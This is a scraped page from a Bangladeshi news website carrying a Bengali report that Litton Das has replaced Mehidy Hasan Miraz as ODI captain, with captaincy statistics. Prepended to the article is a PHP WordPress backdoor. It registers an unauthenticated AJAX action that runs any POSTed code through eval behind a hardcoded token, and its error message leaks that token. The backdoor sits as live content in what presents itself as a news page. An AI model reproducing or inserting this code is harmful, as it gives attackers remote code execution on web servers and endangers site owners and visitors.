// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== মিরাজকে সরিয়ে বাংলাদেশের ওয়ানডে অধিনায়ক লিটন | potrikaybangladesh.com
Sunday, September 27, 2026
Homeমিরাজকে সরিয়ে বাংলাদেশের ওয়ানডে অধিনায়ক লিটন

মিরাজকে সরিয়ে বাংলাদেশের ওয়ানডে অধিনায়ক লিটন

বাংলাদেশ জাতীয় ক্রিকেট দলের ওয়ানডে নেতৃত্বে পরিবর্তন এনেছে বাংলাদেশ ক্রিকেট বোর্ড (বিসিবি)। মেহেদী হাসান মিরাজের পরিবর্তে জাতীয় দলের নতুন ওয়ানডে অধিনায়ক হিসেবে দায়িত্ব পেয়েছেন অভিজ্ঞ ব্যাটার লিটন দাস, যিনি বর্তমানে টি-টোয়েন্টি সংস্করণের অধিনায়কও বটে।

আজ (বুধবার) মিরপুর শেরে বাংলা স্টেডিয়ামের বিসিবির কার্যালয়ে বোর্ড সভা শেষে নতুন অধিনায়কের নাম ঘোষণা করা হয়। এ সময় বিষয়টি নিশ্চিত করেন বিসিবি সভাপতি তামিম ইকবাল খান।

লিটন দাস এর আগে বিভিন্ন সময় ওয়ানডে দলের নেতৃত্ব দিয়েছেন। তবে এবার পূর্ণাঙ্গ ওয়ানডে অধিনায়ক হিসেবে দায়িত্ব পেয়ে বাংলাদেশের সীমিত ওভারের ক্রিকেটে নতুন অধ্যায়ের সূচনা করতে যাচ্ছেন তিনি।

মিরাজের নেতৃত্বে বাংলাদেশের পারফরম্যান্স নিয়ে সাম্প্রতিক সময়ে নানা আলোচনা চলছিল। সেই প্রেক্ষাপটে নেতৃত্বে পরিবর্তনের সিদ্ধান্ত নিয়েছে বিসিবি। ২০২৪ সালে হুট করেই নাজমুল হোসেন শান্তর কাছ থেকে দায়িত্ব নিয়েছিলেন মিরাজ। তার নেতৃত্বে বাংলাদেশ ২৪টি ওয়ানডে খেলেছে। এর মধ্যে জিতেছে ১০টি, হেরেছে ১৩টি এবং একটি ম্যাচের ফল হয়নি।

পরিসংখ্যান বলছে, অন্তত ১০টি ওয়ানডেতে বাংলাদেশকে নেতৃত্ব দেওয়া অধিনায়কদের মধ্যে মিরাজের জয়ের হার ৪৩.৭৫ শতাংশ। এই তালিকায় তার অবস্থান তৃতীয়। তার ওপরে রয়েছেন শুধু মাশরাফি বিন মর্তুজা, যার জয়ের হার ৫৮.১৩ শতাংশ এবং সাকিব আল হাসান, যার জয়ের হার ৪৪.২৬ শতাংশ।

অন্যদিকে লিটন দাস এর আগে নিয়মিত অধিনায়ক অনুপস্থিত থাকলে একাধিকবার দলের দায়িত্ব পালন করেছেন। এখন পর্যন্ত সাতটি ওয়ানডেতে নেতৃত্ব দিয়েছেন তিনি। সেই সাত ম্যাচে বাংলাদেশের জয় তিনটি, হার তিনটি এবং একটি ম্যাচের কোনো ফল হয়নি। অধিনায়ক হিসেবে ব্যাট হাতে খুব একটা সফল হতে পারেননি। ২৯.৮০ গড়ে করেছেন ১৪৯ রান।

লিটনের নেতৃত্বে এবার সাদা বলের দুই সংস্করণেই নতুন অধ্যায় শুরু করতে যাচ্ছে বাংলাদেশ। সামনে গুরুত্বপূর্ণ আন্তর্জাতিক সূচি থাকায় এই সিদ্ধান্তকে দীর্ঘমেয়াদি পরিকল্পনার অংশ হিসেবেই দেখছে ক্রিকেট অঙ্গন। বিসিবির প্রত্যাশা, ব্যাট হাতে দলের অন্যতম নির্ভরযোগ্য এই ক্রিকেটার নেতৃত্বেও বাংলাদেশকে আরও ধারাবাহিক সাফল্যের পথে এগিয়ে নিতে পারবেন।

 

 

 

 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments